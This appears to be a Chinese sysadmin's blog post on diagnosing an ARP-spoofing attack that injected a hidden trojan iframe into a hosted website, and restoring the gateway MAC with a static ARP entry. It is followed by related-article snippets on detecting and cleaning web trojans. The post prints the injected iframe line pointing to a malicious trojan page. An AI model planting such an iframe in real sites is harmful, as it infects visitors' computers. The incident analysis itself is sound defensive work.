今天在接机的路上接到同事电话说网站打开后乱码。同事怀疑受到病毒感染。但是在本机上用curl查看html内容是正常的,初步怀疑是被ARP攻击篡改缺省网关地址,然后挂马。下午一到公司就用curl在其它PC上面查看服务器的内容:
$ curl -i http://www.unknowndns.com/
然后看到content-type正常,html内容的头部被加上:
<iframe src=http://sina8488.com/admin/a93.htm width=20 height=0 frameborder=0></iframe>
从而导致网页乱码,一查真的是木马。赶紧上服务器查看arp cache:
$ /sbin/arp -an
列出的信息与刚托管到IDC时保存的信息对比一下,发现缺省网关的MAC地址被修改成了另外一个MAC地址。于是赶紧修改成原来保存的MAC:
$ /sbin/arp -s 192.168.0.1 00:02:7E:20:06:10
用curl -i http://www.unknowndns.com/查看,被挂的代码消失。
疑问:IDC的交换机应该都有VLAN功能,为什么不能将一家的服务器通过VLAN将另外一家的服务器隔离,禁止ARP跨VLAN广播呢?
分享到:
相关推荐
网页挂马是指攻击者通过篡改或在合法网站上植入恶意代码,当用户访问这些被篡改的网页时,恶意代码会在用户的计算机上自动执行,导致用户的系统被感染病毒、木马等恶意程序的行为。网页挂马是一种常见的网络攻击手段...
网页挂马分析是网络安全领域的重要话题,而MDecoder正是针对这一问题的专业工具。这款软件的主要功能在于检测和分析网页是否遭受了挂马攻击,即不法分子通过在网页中嵌入恶意代码,来控制或者窃取用户的计算机资源或...
网页挂马是一种常见的网络攻击手段,攻击者通过在网页中植入恶意代码,当用户浏览这些网页时,恶意代码会在客户端的浏览器中悄悄执行,进而下载并运行恶意程序,从而达到攻击目的。这类攻击通常利用浏览器或其插件...
网页挂马工作原理完全分析,希望识货的人过来赶快拿啊~~
### 网页挂马代码分析 #### 一、IFrame挂马技术 **知识点:** 1. **IFrame的基本用途与挂马原理** - IFrame(Inline Frame)是HTML文档中的一个内联框架,它允许在当前页面内嵌入另一个页面。 - 挂马原理在于...
金山作为知名的互联网安全公司,其提供的网页防挂马功能旨在检测并阻止潜在的网页挂马行为,保障用户的在线安全。然而,当这个功能出现故障或无法启用时,用户可能会面临网络风险。在这种情况下,"金山网页防挂马...
网页挂马清理是网络安全领域中的一个重要话题,主要指的是检测并清除网页中隐藏的恶意代码,这些代码通常由黑客植入,用于在用户访问受感染的网页时悄悄地在用户的计算机上安装恶意软件。"木马守护神 罩页挂马清理...
护卫神·网页挂马清理工具是一款完全免费的专业清理网页挂马代码的绿色实用小工具,主要是针对网页被频繁挂马的情况而研发的小软件,可以帮助您从海量文件中迅速定位挂马代码并清除,减少您的工作量。 Tags: 挂马...
本版本在1.0的基本上增加智能分析功能,对网页文件中存在的可疑代码有红色显示出来!! 修复功能能对网页中所有包含关键字的代码进行清除。 敬请用户朋友提出意见和建议!!
本文主要介绍网页挂马的工作原理及种类、常见方式、执行方式、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。 1:网页挂马工作原理的种类. (1)工作原理: 作为网页挂马的散布者,其目的是将...
基于HTTP会话过程跟踪的网页挂马攻击检测方法
\n\n网页挂马攻击,又被称为“浏览即下载”攻击,是指攻击者利用网站漏洞,如SQL注入、网站敏感文件扫描、服务器漏洞或0day漏洞,将恶意HTML脚本植入目标网页或内嵌对象。当用户访问这些被感染的网页时,恶意脚本会...
【网页挂马攻击防范】网页挂马攻击是网络安全领域的一大威胁,主要表现为攻击者通过漏洞或弱点在网站上植入恶意代码,导致用户访问时受到感染。尽管许多大型网站已实施了安全防护措施,但仍有部分网站遭受挂马攻击,...
"一种网页挂马攻击中的重定向混淆检测方法" 网页挂马攻击是指攻击者在网站页面中植入恶意代码,从而攻击用户的计算机系统。当前关于网页挂马攻击检测的研究主要集中于静态检测方法和动态检测方法两方面,但是随着...
网页挂马分析专家MDecoder,这是一款非常强大的网页挂马分析工具,欢迎下载
### Ring0钩子防网页挂马技术解析 #### 一、引言 随着互联网的快速发展,网络安全问题日益突出。其中,网页挂马是一种常见的网络攻击方式,它通过在合法网站中植入恶意代码,当用户访问这些网站时,恶意代码会自动...
365网站安全专家网页挂马查杀工具是由宜春启航网络科技有限公司(www.ycqhwl.com)开发的一款网站挂马查杀工具,主要可以查杀各类网页文件中包含的网页木马,并支持数据库木马查杀。也可自由指定查杀网页内容.
由于提供的文件内容涉及网页挂马技术,这是一种非法和不道德的行为,我无法提供相关的操作教程。但我可以向您介绍与网络安全相关的知识点,帮助大家认识网页挂马的危害,以及如何防御网络攻击。 网页挂马通常是指...